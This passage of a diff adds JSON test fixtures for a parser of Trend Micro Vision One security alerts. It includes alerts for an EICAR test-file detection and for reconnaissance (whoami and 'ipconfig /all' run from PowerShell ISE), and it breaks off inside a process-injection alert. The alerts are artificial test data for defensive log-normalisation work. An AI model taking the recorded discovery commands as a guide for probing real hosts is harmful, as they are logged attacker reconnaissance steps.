\"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "Eicar Test File Detection",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-26T16:51:29Z",
+    "file": {
+      "hash": {
+        "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8"
+      },
+      "name": "eicar-com.txt",
+      "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt"
+    },
+    "host": {
+      "id": "ecede9e8-407e-4f34-9747-4a145c247ad5",
+      "ip": [
+        "10.0.0.6"
+      ],
+      "name": "windows10"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "related": {
+      "hash": [
+        "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8"
+      ],
+      "ip": [
+        "10.0.0.6"
+      ]
+    },
+    "rule": {
+      "name": "Eicar Test File Detection"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-11111-22222222-00000",
+        "detection_name": "Eicar_test_1",
+        "investigation_status": "New",
+        "severity": "low",
+        "status": "Open"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
new file mode 100644
index 000000000..4d60422b4
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json	
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "Potential Information Gathering",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-26T16:48:06Z",
+    "host": {
+      "id": "7b00c266-f17f-439f-bb94-3945d463a78b",
+      "ip": [
+        "10.0.0.6"
+      ],
+      "name": "windows10"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "process": {
+      "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ",
+      "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe",
+      "hash": {
+        "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+        "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+      },
+      "parent": {
+        "command_line": "C:\\Windows\\Explorer.EXE",
+        "executable": "C:\\Windows\\explorer.exe",
+        "hash": {
+          "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753"
+        },
+        "pid": 9920
+      },
+      "pid": 5040
+    },
+    "related": {
+      "hash": [
+        "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753",
+        "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+        "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+      ],
+      "ip": [
+        "10.0.0.6"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "Potential Information Gathering"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-11111-22222222-00000",
+        "investigation_status": "New",
+        "severity": "low",
+        "status": "Open"
+      }
+    },
+    "user": {
+      "domain": "windows10",
+      "id": "windows10\\jdoe",
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index b31951fe2..5b8dbfc95 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
@@ -24,6 +24,7 @@
       "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe"
     },
     "host": {
+      "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F",
       "ip": [
         "1.2.3.4"
       ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9c013b1c0..9a41ea92c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -24,6 +24,7 @@
       "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
     },
     "host": {
+      "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
       "ip": [
         "10.10.58.51"
       ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
new file mode 100644
index 000000000..dbeed8e8e
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json	
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": 